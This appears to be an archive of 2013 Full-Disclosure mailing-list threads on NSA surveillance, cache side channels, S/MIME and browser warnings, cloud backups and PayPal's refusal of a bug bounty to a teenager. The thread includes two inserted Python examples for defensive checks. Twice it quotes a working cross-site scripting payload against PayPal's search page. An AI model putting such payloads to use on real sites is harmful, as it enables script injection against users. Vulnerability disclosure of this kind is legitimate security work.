On 08/01/2013 11:31 AM, XF wrote:

Did you understand how they collect data? This is not clear for me... ISP backdoor? Optical tap on submarine wire?

On 1 Aug 2013 at 16:26, Georgi Guninski gunin...@guninski.com wrote:

it will be interesting to me what will remain of the nsa when the chinese comrades stop giving fresh money to the usa. Detroit news are not very pink.

On Thu, Aug 01, 2013 at 11:20:27PM +1200, Hugh Davenport wrote:

meanwhile, in new zealand, prime minister suggests that we aren't the slaves for nsa...

On 2013-08-01 19:23, Georgi Guninski wrote:

XKeyscore sees 'nearly EVERYTHING you do online'
http://www.theregister.co.uk/2013/07/31/prism_put_in_the_shade_by_leak_about_even_more_powerful_snoop_tool/

New NSA tool exposed: XKeyscore sees 'nearly EVERYTHING you do online'

From the presentation:
* Show me all the exploitable machines in country X
* How do I find a cell of terrorists that has no connection to known strong-selectors
** Anomalous events
*** Someone who is using encryption
Re: [Full-disclosure] XKeyscore sees 'nearly EVERYTHING you do online
On Thu, Aug 1, 2013 at 6:36 PM, Gary Baribault g...@baribault.net wrote:

I think the NSA could twist arms in the U.S. and I think that they could have a deal with the U.K. and maybe Canada; what I have HUGE doubts about is how they transport all of that data back to their data centres, unless they have a massive quantity of dark (private) fibre that no one knows about.

It does not appear to be a centralized architecture. According to the slides, they have servers situated all around the world. Per slide 5, there are 500+ servers. According to slide 7, there are 700+ servers at 150 sites throughout the world. The reason for the difference in numbers of servers is not readily apparent. When an analyst performs a query, the servers return the appropriate data.

Jeff

On 08/01/2013 04:46 PM, XF wrote:

So you think this is real? All Tier 1s would be partners with the NSA? Even in Europe? This sounds crazy

On 1 Aug 2013 at 22:19, Gary Baribault g...@baribault.net wrote:

Don't forget that they also have to back haul that data to their data centres !! They would have to have secret agreements with all of the Tier 1 carriers. Sure sounds far fetched!

Gary B

On 08/01/2013 03:51 PM, XF wrote:

Right. But where are their taps? In Internet Exchange Points? In ASes? And how can they do that? Hello, I'm NSA, can I get a TAP on your network :-) This would say that ISPs agree and the amount of data to transfer would be so vast. How can they transfer all this amount of data into their system??

On 1 Aug 2013 at 20:56, Gary Baribault g...@baribault.net wrote:

Optically tapping ALL of the submarine cable going into and out of the U.S. would still not give them ALL of the claimed data. They have to be tapping all of the major traffic exchange sites in the U.S. to get this kind of data.

Gary B

On 08/01/2013 11:31 AM, XF wrote:

Did you understand how they collect data? This is not clear for me... ISP backdoor? Optical tap on submarine wire?
On 1 Aug 2013 at 16:26, Georgi Guninski gunin...@guninski.com wrote:

it will be interesting to me what will remain of the nsa when the chinese comrades stop giving fresh money to the usa. Detroit news are not very pink.

On Thu, Aug 01, 2013 at 11:20:27PM +1200, Hugh Davenport wrote:

meanwhile, in new zealand, prime minister suggests that we aren't the slaves for nsa...

On 2013-08-01 19:23, Georgi Guninski wrote:

XKeyscore sees 'nearly EVERYTHING you do online'
http://www.theregister.co.uk/2013/07/31/prism_put_in_the_shade_by_leak_about_even_more_powerful_snoop_tool/

New NSA tool exposed: XKeyscore sees 'nearly EVERYTHING you do online'

From the presentation:
* Show me all the exploitable machines in country X
* How do I find a cell of terrorists that has no connection to known strong-selectors
** Anomalous events
*** Someone who is using encryption
Re: [Full-disclosure] Flush+Reload: a High Resolution, Low Noise, L3 Cache Side-Channel Attack
On Fri, Jul 26, 2013 at 3:37 PM, valdis.kletni...@vt.edu wrote: On Fri, 26 Jul 2013 07:31:09 +0100, Hurgel Bumpf said: Just found this online.. might be of interest. Direct PDF: http://eprint.iacr.org/2013/448.pdf From the fine PDF: "The Flush+Reload attack is a variant of the Prime+Probe attack that relies on sharing pages between the spy and the victim programs. With shared pages, the spy program can ensure that a specific memory line is evicted from the whole cache hierarchy. The spy uses this to monitor access to the memory line." The fact you need to get gnupg to share the pages in question with you does mean that this isn't, by itself, a knockout blow. Still quite the interesting attack. And attacks always improve. Maybe somebody will find a way to do better...

Dr. Bernstein puts a lot of effort into defending against timing attacks and other side channels in his NaCl library. I'm not aware of any other libraries which go to the same depths. On the downside, NaCl is not easy to work with (for example, change compilers or cross-compile for iOS or Android); it's not really portable (lots of C language violations); nor is it easy to get analysis tools on it. Recently, he presented an OWASP talk that included the subject matter (including lots of other practical crypto failures).
* Slides: http://www.secappdev.org/handouts/2012/Dan%20J.%20Bernstein/worst%20practices.pdf
* Talk: https://www.owasp.org/download/jmanico/owasp_podcast_95.mp3
* Video: http://secappdev.org/lectures/144
For DNSSEC fans, he beats the hell out of DNSSEC for its amplification attacks and other info leaks. Jeff
Re: [Full-disclosure] Trustlook Found Hundreds of Malicious Applications in the Google Play Store
On Fri, Jul 26, 2013 at 11:13 AM, bugfree bugf...@gmail.com wrote: Here is the article. http://blog.trustlook.com/news/trustlook-found-hundreds-of-malicious-applications-in-the-google-play-store/

Peter Gutmann has a lot of fun with over-permissioned battery apps in his book Engineering Security (www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf). As you've learned, allowing naive users to give invasive apps too many permissions is not perceived as a threat. It's a shame AOSP is still making the same engineering mistakes from the 1980s and 1990s. Users are not going to miraculously wake up tomorrow with additional security-IQ points. Jeff
Re: [Full-disclosure] [SE-2012-01] New Reflection API affected by a known 10+ years old attack
On Thu, Jul 18, 2013 at 12:50 AM, Security Explorations cont...@security-explorations.com wrote: Hello All, We discovered yet another indication that the new Reflection API introduced into Java SE 7 was not subject to a thorough security review (if any).

I'm kind of surprised some of these bugs exist for so long. Allowing them to fester and rot can't be good (I have not been able to come up with a use case where it is desired or preferred). Does anyone know anything about Oracle's engineering process? What is Oracle doing to ensure issues are tracked and remediated in reasonable time? What does the process include for code scanning to catch low hanging fruit? Are they using FindBugs or Coverity (I checked scan.coverity.com, and I did not see Oracle Java or OpenJDK listed, so I wonder if they are doing it internally)? What is the QA process doing to ensure items with negative impact are not allowed to pass? Jeff
Re: [Full-disclosure] [SE-2012-01] New Reflection API affected by a known 10+ years old attack
On Sat, Jul 20, 2013 at 5:27 PM, Bob iPhone Kim evdo.hs...@gmail.com wrote: Guys... can we keep personal discussions personal???

I'm not sure questioning the engineering process is off-topic in this case (http://lists.grok.org.uk/full-disclosure-charter.html): "Acceptable Content - Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information." If it is, then please accept my apologies. Jeff
Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)
On Fri, Jun 21, 2013 at 7:48 AM, Georgi Guninski gunin...@guninski.com wrote: On Thu, Jun 20, 2013 at 03:57:20PM -0700, Kurt Buff wrote: ... I won a moderate amount of beer from bets on "when will FreeBSD ditch gcc from base?". Fanatics took the bait and got mad at the observation that FreeBSD wouldn't exist in its current form without gcc. Since at least recently, clang can't compile some stuff g++ can (almost surely GNU extensions).

Clang has caused a lot of pain and misery because it claims to be GCC, but it can't digest programs with GCC extensions. https://www.google.com/#q=clang+__GNUC__+bug Jeff
Re: [Full-disclosure] [Newbie] How to search in all full-disclosure@lists.grok.org.uk
On Fri, Jun 21, 2013 at 10:38 AM, JOSE DAMICO jd.comm...@gmail.com wrote: Hi, Is there a way to make a full search by keyword in the whole full-disclosure@lists.grok.org.uk archive of messages?

In Google: search terms site:seclists.org/fulldisclosure Jeff
Re: [Full-disclosure] Microsoft Outlook Vulnerability: S/MIME Loss of Integrity
On Mon, Jun 17, 2013 at 11:19 AM, ACROS Security Lists li...@acros.si wrote: Valdis, "No, that's how to do it *hardline*. There are many in the security industry that will explain to you that it's also doing it *wrong*. Hint - the first time that HR sends out a posting about a 3-day window next week to change your insurance plan without penalty, signs it with something that doesn't match the From:, and the help desk is deluged by phone calls from employees who can't read the mail, the guy who put "You shall not pass" in place will be starting a job hunt." If there was an industry standard specifying the you-shall-not-pass for all web browsers, it wouldn't be the guy (developer) who put this roadblock in place that would start a job hunt but someone within the company whose job was to avoid the roadblock by making sure the cert that HR is using was okay. That would happen a couple of times, and then not any more, as people have great capacity for learning. ... If I get an encrypted message that was mistakenly not encrypted with my key, it would be very productive to have a "Just decrypt anyway" button but we obviously don't have that. ...

A lot of folks would like to have that button ;) Jeff
Re: [Full-disclosure] Microsoft Outlook Vulnerability: S/MIME Loss of Integrity
On Mon, Jun 17, 2013 at 2:49 PM, Daniël W. Crompton daniel.cromp...@gmail.com wrote: How would that work? AFAIK S/MIME is public key cryptography; how would you decrypt a message which is not encrypted with your public key?

Exactly. How does one decrypt when they don't hold the private key? That magic button would come in handy for a lot of folks. Jeff

On 17 June 2013 20:17, Jeffrey Walton noloa...@gmail.com wrote: On Mon, Jun 17, 2013 at 11:19 AM, ACROS Security Lists li...@acros.si wrote: Valdis, "No, that's how to do it *hardline*. There are many in the security industry that will explain to you that it's also doing it *wrong*. Hint - the first time that HR sends out a posting about a 3-day window next week to change your insurance plan without penalty, signs it with something that doesn't match the From:, and the help desk is deluged by phone calls from employees who can't read the mail, the guy who put "You shall not pass" in place will be starting a job hunt." If there was an industry standard specifying the you-shall-not-pass for all web browsers, it wouldn't be the guy (developer) who put this roadblock in place that would start a job hunt but someone within the company whose job was to avoid the roadblock by making sure the cert that HR is using was okay. That would happen a couple of times, and then not any more, as people have great capacity for learning. ... If I get an encrypted message that was mistakenly not encrypted with my key, it would be very productive to have a "Just decrypt anyway" button but we obviously don't have that. ... A lot of folks would like to have that button ;)
[Full-disclosure] Apple and Wifi Hotspot Credentials Management Vulnerability
This vulnerability was published to the OWASP Mobile Security list as a research paper by Andreas Kurtz, Daniel Metz and Felix Freiling. See "Cracking iOS personal hotspots using a Scrabble crossword game word list", http://lists.owasp.org/pipermail/owasp-mobile-security-project/2013-June/000640.html. It appears Apple Wifi hotspot passwords are generated using a wordlist consisting of 1842 words. The authors built a custom cracker to aid in recovery of the Wifi hotspot passwords. The paper's homepage can be found at https://www1.cs.fau.de/hotspot. The paper does not offer a CWE classification or CVE at this point in time.
Re: [Full-disclosure] Apple and Wifi Hotspot Credentials Management Vulnerability
On Mon, Jun 17, 2013 at 3:35 PM, Jeffrey Walton noloa...@gmail.com wrote: ... It appears Apple Wifi hotspot passwords are generated using a wordlist consisting of 1842 words. The authors built a custom cracker to aid in recovery of the Wifi hotspot passwords.

My bad. The application estimates the time to crack the password used. It does not attempt to recover the password.
Re: [Full-disclosure] Microsoft Outlook Vulnerability: S/MIME Loss of Integrity
On Mon, Jun 17, 2013 at 9:32 AM, Patrick Dunstan patrick.duns...@gmail.com wrote: Completely agree with your sentiments here, Valdis. The error messages given to everyday users are completely ridiculous in most cases. I feel though with the padlocks and green bars in browsers nowadays, there has at least been some effort made to make security understandable for the average user out there. But you're right in saying so much more is needed/could be done.

The browsers are just confusing users. Consider:
- No encryption (plain HTTP) - good, no indicators
- Opportunistic encryption (self signed, HTTPS) - bad, red bar
- Encryption (CA, HTTPS) - good, green bar
As Peter Gutmann puts it, getting a certificate for a website is like getting one from a vending machine (race to the bottom, FTW), so a CA certificate has no more value than a self signed certificate used in opportunistic encryption. Yet users are told opportunistic encryption is bad, and plain text HTTP is good. And CAs keep making money while disavowing all warranties and liability for the certificates they issue. And don't get me started on the security dialogs written by geeks for geeks (or more correctly, INTPs and INTJs from the Myers-Briggs Type Indicator (MBTI)).

What bewilders me in 2013 is that email has been completely left behind. ... Case in point: Google doesn't even offer support for S/MIME in GMail and it's probably the most widely used online email service available today.

+1 (I'd love to give you more). Jeff

On Mon, Jun 17, 2013 at 10:23 PM, valdis.kletni...@vt.edu wrote: On Sun, 16 Jun 2013 00:51:10 +0930, Defence in Depth said: Microsoft Outlook (all versions) suffers from an S/MIME loss of integrity issue. Outlook does not warn against a digitally signed MIME message whose X509 EmailAddress attribute does not match the mail's From address.

Congrats on the technical side, for spotting this. On the flip side, there are a number of cases where the signer address legitimately does not match the From: address. For instance - if the signer is listed in Sender: instead of From:, if it has passed through a mailing list that rewrites the From: line, or some combinations of resends and forwards. And yes, a lot of this sort of crap is only semi-legit because it's coming from misconfigured servers - but operational reality dictates that you have to deal with the fact that there's a *lot* of (And we'll overlook the additional fun and games available due to the distinction between an RFC821 MAIL FROM: and an RFC822 From: line). I suppose it could be worse - it's been a few years since I last saw a %-hacked address in an e-mail.

A few operational notes regarding alerts in user-facing software:
1) A lot of browsers used to display broken padlocks when SSL failed. They don't do this anymore because users *will not* look at that sort of subtle warning.
2) They'll look at a big pop-up that obstructs their view - but only if it happens so rarely that they have to call somebody and ask "wtf is this?". If it becomes an "oh it does this once every week or two" click-through, it's now become worse than useless.

As you noted, most browsers will notify the user if the browser detects a CN mismatch. What you gloss over is that browsers *totally suck* at presenting that warning in a way that is both understandable and actionable to a general user. Just yesterday I had Firefox alert on an SSL certificate mismatch, and it gave me the helpful info that the certificate presented was only valid for *.akamai.net. Now, *I* know exactly what happened there, and *you* know, and the guy who pushed some content to Akamai without looking to see if there were https: links pointing at the content will go "D'Oh!" when he finds out - but if you're Joe Sixpack and don't know if Akamai is a box in your ISP's server room or a box in a server room in the Ukraine, you got nothing. And if you get enough of these totally annoying pop ups, you'll just learn to click through without thinking.

Bottom line: yes, it would be nice if all this sort of stuff was more widely deployed and enforced. But given that we've tried this with dismal results with Windows UAC alerts, firewall alerts, browser alerts, and A/V alerts, there's no real reason to expect that *this* time we'll actually get it right for MUA alerts. Bonus points for the most creative suggestion for how to leverage a *fake* From:/signature mismatch alert into a compromise (a la fake AV alerts that get you to download actual malware). Really - Outlook may do this wrong, but I don't think we as an industry have a frikking clue how to actually do this right.
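The check Outlook is said to skip, with the legitimate-mismatch cases Valdis lists (Sender: instead of From:, resends) taken into account. This is an added example, not code from the thread or from any mail client: it assumes the signature has already been verified and that the e-mail addresses bound to the signing certificate (rfc822Name SANs or the legacy E= attribute) have been extracted as plain strings; the header blocks and addresses are constructed. Matches via anything other than From: are reported as "weak" so a policy can show a soft indicator rather than a hard block.

```python
"""Originator-address check for an S/MIME-signed message.

Added example, not code from the thread or from any mail client. The verifier is
assumed to have already validated the signature and extracted the e-mail
addresses bound to the signing certificate (rfc822Name SANs or the legacy
E= attribute); those come in as plain strings. Messages below are constructed.
"""
from email import message_from_string
from email.utils import getaddresses
from typing import Dict, List, Optional, Tuple

# Header fields that may legitimately carry the signer's address. From: is the
# normal case. Sender: covers "sent on behalf of" and list software that
# rewrites From: but keeps Sender:; Resent-* covers resent mail. A match found
# only via a non-From field is reported as "weak", not as a hard match.
ORIGINATOR_FIELDS = ("From", "Sender", "Resent-From", "Resent-Sender")


def normalize(addr: str) -> Tuple[str, str]:
    """Split an address into (local-part, domain).

    RFC 5280 section 7.5 compares rfc822Name values with a case-sensitive
    local-part and a case-insensitive domain, so only the domain is folded.
    """
    local, _, domain = addr.strip().rpartition("@")
    return local, domain.lower()


def header_addresses(raw_message: str) -> Dict[str, List[str]]:
    """Collect every address found in each originator field."""
    msg = message_from_string(raw_message)
    found: Dict[str, List[str]] = {}
    for field in ORIGINATOR_FIELDS:
        values = msg.get_all(field) or []
        addrs = [addr for _, addr in getaddresses(values) if addr]
        if addrs:
            found[field] = addrs
    return found


def check_signer(raw_message: str, cert_emails: List[str]) -> Tuple[str, Optional[str]]:
    """Return (verdict, header field that matched).

    "match"    an address in From: is bound to the signing certificate
    "weak"     only Sender:/Resent-From:/Resent-Sender: matches
    "mismatch" no originator address is bound to the certificate
    "no-email" the certificate carries no e-mail address at all
    """
    bound = {normalize(e) for e in cert_emails}
    if not bound:
        return "no-email", None
    fields = header_addresses(raw_message)
    for field in ORIGINATOR_FIELDS:
        for addr in fields.get(field, []):
            if normalize(addr) in bound:
                return ("match" if field == "From" else "weak"), field
    return "mismatch", None


# Constructed sample headers; bodies and the signature blob itself are omitted.
HR_DIRECT = "From: HR <hr@example.com>\nTo: staff@example.com\nSubject: Benefits window\n\n"
HR_ON_BEHALF = ("From: HR <hr@example.com>\nSender: Alice <alice@example.com>\n"
                "To: staff@example.com\nSubject: Benefits window\n\n")

if __name__ == "__main__":
    print(check_signer(HR_DIRECT, ["hr@example.com"]))         # ('match', 'From')
    print(check_signer(HR_ON_BEHALF, ["alice@EXAMPLE.COM"]))   # ('weak', 'Sender')
    print(check_signer(HR_DIRECT, ["attacker@evil.example"]))  # ('mismatch', None)
```

Note the deliberately strict local-part comparison: a certificate for HR@example.com does not match From: hr@example.com, which is what RFC 5280 prescribes and which is also why "hardline" enforcement generates the help-desk calls described above. The list-rewrite case is only handled when the list preserves Sender:; a list that rewrites From: and drops Sender: will still show as a mismatch.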
Re: [Full-disclosure] PAYPAL BUG BOUNTY PROGRAM 2013 - UPDATES TRANSPARENCY
On Thu, Jun 13, 2013 at 3:54 PM, Vulnerability Lab resea...@vulnerability-lab.com wrote: Today is a great day! All the wishes around the bug bounty program came up yesterday with a cool update. PayPal Inc split the bug bounty program into 2 transparent information categories. It's available to list researchers in each of the 4 quarters of the year. The policy and details of the program received a full update. Check it out ;)

Honorable Mention: 2013-Q1 - PayPal would like to recognize everyone else who contributed a valid submission in Quarter 1, 2013. We appreciate all efforts and contributions to our Bug Bounty Program. URL: https://www.paypal.com/webapps/mpp/security-tools/wall-of-fame-honorable-mention

Bug Bounty Wall of Fame: 2013-Q1 - PayPal would like to recognize our top 10 researchers for Quarter 1, 2013. We will update this page quarterly to reflect the efforts of our researcher community. We have listed our top 10 researchers below in alphabetical order along with their specified organization. Thank you for all of your efforts in keeping PayPal the safer way to pay online. URL: https://www.paypal.com/webapps/mpp/security-tools/wall-of-fame

Robert Kugler did not make the top ten list or the honorable mention list. Kugler is the fellow who was denied a bounty because he was too young. Transparent lies have no value. Transparency or not, PayPal has no credibility. Jeff
Re: [Full-disclosure] Why PRISM kills the cloud | Computerworld Blogs
On Mon, Jun 10, 2013 at 9:15 PM, laurent gaffie laurent.gaf...@gmail.com wrote: Why is the Prism program such a big deal today? Most of us knew about Echelon and the Patriot Act, didn't we? This program was unconstitutional in the first place and should have raised indignation when it was approved at that time...

+1. Below is my standard verbiage on clouds and backups to clouds. Jeff

Clouds and drop boxes. If you don't want your data analyzed, inspected, shared, or mishandled, then don't provide it in the first place. Data migration includes backups, so ensure you are using the proper attributes on your files. For Apple systems, the file should have the kCFURLIsExcludedFromBackupKey file property or the com.apple.MobileBackup extended attribute (see Technical Q&A QA1719 for details). Android applications should add android:allowBackup on the application tag and set it to false in AndroidManifest.xml. Windows' integrated cloud backup is new, and there's currently no way for an application to back up to the cloud (and hence, no way to stop it). A layman's analysis of License Agreements and Terms and Conditions will reveal how little security is afforded to your documents in cloud storage. For those who don't read them, one popular platform has 142 separate documents covering Terms and Conditions for its cloud alone.[18] The documents discuss your rights if the company (1) gives away your data, (2) shares your data with partners, (3) loses your data, (4) provides your data to authorities (sometimes without an order or warrant), (5) does not provide reasonable skill or care, (6) commits willful misconduct or fraud, and (7) acts with negligence or gross negligence. "Your rights" is misleading since it is consent, and the document effectively states you indemnify the company: "You agree to defend, indemnify and hold [company], its affiliates, subsidiaries, directors, officers, employees, agents, partners, contractors, and licensors harmless from any claim or demand, including reasonable attorneys' fees, made by a third party."[19]

[18] iCloud Terms and Conditions, https://www.apple.com/legal/internet-services/icloud/ww/
[19] iCLOUD TERMS AND CONDITIONS, https://www.apple.com/legal/internet-services/icloud/en/terms.html

On 2013-06-10 19:46, Ivan .Heca ivan...@gmail.com wrote: http://m.blogs.computerworld.com/cloud-storage/22305/why-prism-kills-cloud
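The Android half of the backup advice above, as a check a reviewer can run over an AndroidManifest.xml and a fixer that applies the recommended setting. This is an added example, not code from the thread or from the Android SDK; the manifest is constructed. The only facts it relies on are the android: namespace URI and that android:allowBackup defaults to true when the attribute is absent, so a manifest that never mentions it is opted in to backup. The iOS attributes named above are not covered here.

```python
"""Check and fix android:allowBackup in AndroidManifest.xml.

Added example, not code from the thread or from Android tooling. Facts relied
on: the android: namespace URI, and that allowBackup defaults to true when the
attribute is absent. The manifest below is constructed for illustration.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
ALLOW_BACKUP = "{%s}allowBackup" % ANDROID_NS  # Clark notation used by ElementTree

# Keep the conventional android: prefix when serializing instead of ns0:
ET.register_namespace("android", ANDROID_NS)


def _application(root: ET.Element) -> ET.Element:
    app = root.find("application")
    if app is None:
        raise ValueError("manifest has no <application> element")
    return app


def allow_backup_state(manifest_xml: str) -> str:
    """Classify the backup setting.

    "explicit-false"        backups are disabled
    "explicit-true"         backups are explicitly enabled
    "missing-default-true"  attribute absent; the platform default (true) applies
    """
    app = _application(ET.fromstring(manifest_xml))
    value = app.get(ALLOW_BACKUP)
    if value is None:
        return "missing-default-true"
    return "explicit-false" if value.strip().lower() == "false" else "explicit-true"


def harden_manifest(manifest_xml: str) -> str:
    """Return the manifest with android:allowBackup="false" set on <application>."""
    root = ET.fromstring(manifest_xml)
    _application(root).set(ALLOW_BACKUP, "false")
    return ET.tostring(root, encoding="unicode")


# Constructed manifest: no allowBackup attribute, so the app is backed up by default.
WEAK_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.notes">
  <application android:label="Notes" android:icon="@mipmap/ic_launcher">
    <activity android:name=".MainActivity"/>
  </application>
</manifest>"""

if __name__ == "__main__":
    print(allow_backup_state(WEAK_MANIFEST))            # missing-default-true
    hardened = harden_manifest(WEAK_MANIFEST)
    print(allow_backup_state(hardened))                 # explicit-false
    print(hardened)
```

The "missing" case is the one that matters in review: a manifest that looks clean because it says nothing about backup is the weak configuration, and the check reports it separately from an explicit true so the finding can be explained as a default rather than a developer decision.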
Re: [Full-disclosure] PayPal.com XSS Vulnerability
Hi James, "I guess the email from ebay sorta makes it all moot anyway." It's interesting how the reason code changed. On May 24 the reason was Kugler was too young; and then on May 29 the reason was the flaw was previously reported. It sounds like PayPal is lying to bring this to an end; and they've lost more credibility. Jeff

On Wed, May 29, 2013 at 9:22 AM, James Condron ja...@zero-internet.org.uk wrote: Ah, but then don't forget that in a contract (which this most certainly is not - but the parallels are there) ambiguity benefits the party which didn't draft the document. If it's reasonable to infer a payment, and reasonable to fail to infer an age range, I think it's reasonable to get paid for it. I guess the email from ebay sorta makes it all moot anyway.

On 29 May 2013, at 13:33, Julius Kivimäki julius.kivim...@gmail.com wrote: Well, they don't exactly state that they're going to pay you either.

2013/5/29 Źmicier Januszkiewicz ga...@tut.by: Hmm, interesting. For some reason I fail to find the mentioned age requirements at the official bug bounty page located at https://www.paypal.com/us/webapps/mpp/security/reporting-security-issues Am I looking in the wrong direction? Can someone please point to where this is written? With kind regards, Z.

2013/5/29 Robert Kugler robert.kugle...@gmail.com: 2013/5/29 Jeffrey Walton noloa...@gmail.com: On Fri, May 24, 2013 at 12:38 PM, Robert Kugler robert.kugle...@gmail.com wrote: Hello all! I'm Robert Kugler, a 17 years old German student who's interested in securing computer systems. I would like to warn you that PayPal.com is vulnerable to a Cross-Site Scripting vulnerability! PayPal Inc. is running a bug bounty program for professional security researchers. ... Unfortunately PayPal disqualified me from receiving any bounty payment because of being 17 years old... ... I don't want to allege PayPal a kind of bug bounty cost saving, but it's not the best idea when you're interested in motivated security researchers...

Fortunately Microsoft and Firefox took a more reasonable position for the bugs you discovered with their products. PCWorld and MSN picked up the story: http://www.pcworld.com/article/2039940/paypal-denies-teenager-reward-for-finding-website-bug.html and http://now.msn.com/paypal-denies-reward-to-robert-kugler-teen-who-found-bug-in-code . It is now newsworthy to Wikipedia, where it will live forever under Criticisms (unfortunately, it appears PayPal does a lot of questionable things so it's just one of a long list). Jeff

Today I received an email from PayPal Site Security: "Hi Robert, We appreciate your research efforts and we are sorry that our age requirements restrict you from participating in our Bug Bounty Program. With regards to your specific bug submission, we should have also mentioned that the vulnerability you submitted was previously reported by another researcher and we are already actively fixing the issue. We hope that you understand that bugs that have previously been reported to us are not eligible for payment as we must honor the original researcher that provided the vulnerability. I would also mention that in general, PayPal has been a consistent supporter of what is known as 'responsible disclosure'. That is, ensuring that a company has a reasonable amount of time to fix a bug from notification to public disclosure. This allows the company to fix the bug, so that criminals cannot use that knowledge to exploit it, but still gives the researchers the ability to draw attention to their skills and experience. When researchers go down the 'full disclosure' path, it then puts us in a race with criminals who may successfully use the vulnerability you found to victimize our customers. We do not support the full disclosure methodology, precisely because it puts real people at unnecessary risk. We hope you keep that in mind when doing future research. We acknowledge that PayPal can do more to recognize younger security researchers around the world. As a first step, we would like you to be the first security researcher in the history of our program to receive an official Letter of Recognition from our Chief Information Security Officer Michael Barrett (attached, will follow up with a signed copy tomorrow). We truly appreciate your contribution to helping keep PayPal secure for our customers and we will continue to explore other ways that we can provide alternate recognition for younger researchers. We'd welcome the chance to explain this all to you first hand over the phone, please email us at this address with a number and good time to reach you and we'd be happy to follow-up. Thank you, PayPal Site Security"

It's still curious that they only mentioned the first researcher who previously found the bug after all the media attention... Nevertheless I appreciate their intentions to acknowledge also younger security researchers.
Re: [Full-disclosure] PayPal.com XSS Vulnerability
On Tue, May 28, 2013 at 8:26 AM, Dan Kaminsky d...@doxpara.com wrote: So there's this pile of law around the world around work and kids; it's a rather recent development that 18-year-olds can find problems that multibillion dollar interests are willing to pay bounties for.

I'm probably splitting hairs here, but there appears to be a cultural bias built in. At 17+, Robert would have been of age if he was Japanese under Kazoe year-counting.

The laws are all trying to protect you from being made to pick berries or sew t-shirts instead of going to class and playing outside.

The humor was not lost upon me that politicians and lawyers are trying to legislate morality. How ironic! FTW: https://www.google.com/search?q=teenage+science+competition? Jeff

On Fri, May 24, 2013 at 9:38 AM, Robert Kugler robert.kugle...@gmail.com wrote: Hello all! I'm Robert Kugler, a 17 years old German student who's interested in securing computer systems. I would like to warn you that PayPal.com is vulnerable to a Cross-Site Scripting vulnerability! PayPal Inc. is running a bug bounty program for professional security researchers. https://www.paypal.com/us/webapps/mpp/security/reporting-security-issues XSS vulnerabilities are in scope. So I tried to take part and sent my find to PayPal Site Security. The vulnerability is located in the search function and can be triggered with the following javascript code:

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//--></SCRIPT>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search Screenshot: http://picturepush.com/public/13144090

Unfortunately PayPal disqualified me from receiving any bounty payment because of being 17 years old... PayPal Site Security: "To be eligible for the Bug Bounty Program, you must not: ... Be less than 18 years of age. If PayPal discovers that a researcher does not meet any of the criteria above, PayPal will remove that researcher from the Bug Bounty Program and disqualify them from receiving any bounty payments." I don't want to allege PayPal a kind of bug bounty cost saving, but it's not the best idea when you're interested in motivated security researchers...
Re: [Full-disclosure] PayPal.com XSS Vulnerability
On Tue, May 28, 2013 at 10:47 AM, Kirils Solovjovs kirils.solovj...@kirils.com wrote: I suppose PayPal just wants to stay clear of any possible legal trouble/issues/complications. It's easier that way.

Well, I suppose they are going to fix the issue pointed out by Kugler (and the additional issues from Parker). Do you think PayPal trolls lemonade stands run by children and takes their lemonade without paying to avoid possible legal problems? Jeff
Re: [Full-disclosure] PayPal.com XSS Vulnerability
On Fri, May 24, 2013 at 12:38 PM, Robert Kugler robert.kugle...@gmail.com wrote: Hello all! I'm Robert Kugler, a 17 years old German student who's interested in securing computer systems. I would like to warn you that PayPal.com is vulnerable to a Cross-Site Scripting vulnerability! PayPal Inc. is running a bug bounty program for professional security researchers. ... Unfortunately PayPal disqualified me from receiving any bounty payment because of being 17 years old... ... I don't want to allege PayPal a kind of bug bounty cost saving, but it's not the best idea when you're interested in motivated security researchers...

Fortunately Microsoft and Firefox took a more reasonable position for the bugs you discovered with their products. PCWorld and MSN picked up the story: http://www.pcworld.com/article/2039940/paypal-denies-teenager-reward-for-finding-website-bug.html and http://now.msn.com/paypal-denies-reward-to-robert-kugler-teen-who-found-bug-in-code. It is now newsworthy to Wikipedia, where it will live forever under Criticisms (unfortunately, it appears PayPal does a lot of questionable things so it's just one of a long list). Jeff
Re: [Full-disclosure] PayPal.com XSS Vulnerability
Hi Robert, "Unfortunately PayPal disqualified me from receiving any bounty payment because of being 17 years old..." Interesting. The Bug Bounty page (https://www.paypal.com/us/webapps/mpp/security/reporting-security-issues) does not state there's an age restriction or minimum. It appears PayPal is sending the message that it's best to sell the bug privately, rather than participate in responsible disclosure (despite what their Bug Bounty page states). Has anyone written about the issue? For example, an established researcher? I'd like to see homage paid on PayPal's Wikipedia page (Wikipedia has some rules about citing sources, so the person writing would have to meet criteria). Sorry to hear about the crappy treatment. Jeff

On Fri, May 24, 2013 at 12:38 PM, Robert Kugler robert.kugle...@gmail.com wrote: Hello all! I'm Robert Kugler, a 17 years old German student who's interested in securing computer systems. I would like to warn you that PayPal.com is vulnerable to a Cross-Site Scripting vulnerability! PayPal Inc. is running a bug bounty program for professional security researchers. https://www.paypal.com/us/webapps/mpp/security/reporting-security-issues XSS vulnerabilities are in scope. So I tried to take part and sent my find to PayPal Site Security. The vulnerability is located in the search function and can be triggered with the following javascript code:

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//--></SCRIPT>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search Screenshot: http://picturepush.com/public/13144090

Unfortunately PayPal disqualified me from receiving any bounty payment because of being 17 years old... PayPal Site Security: "To be eligible for the Bug Bounty Program, you must not: ... Be less than 18 years of age. If PayPal discovers that a researcher does not meet any of the criteria above, PayPal will remove that researcher from the Bug Bounty Program and disqualify them from receiving any bounty payments." I don't want to allege PayPal a kind of bug bounty cost saving, but it's not the best idea when you're interested in motivated security researchers... Best regards, Robert Kugler
Re: [Full-disclosure] On Skype URL eavesdropping
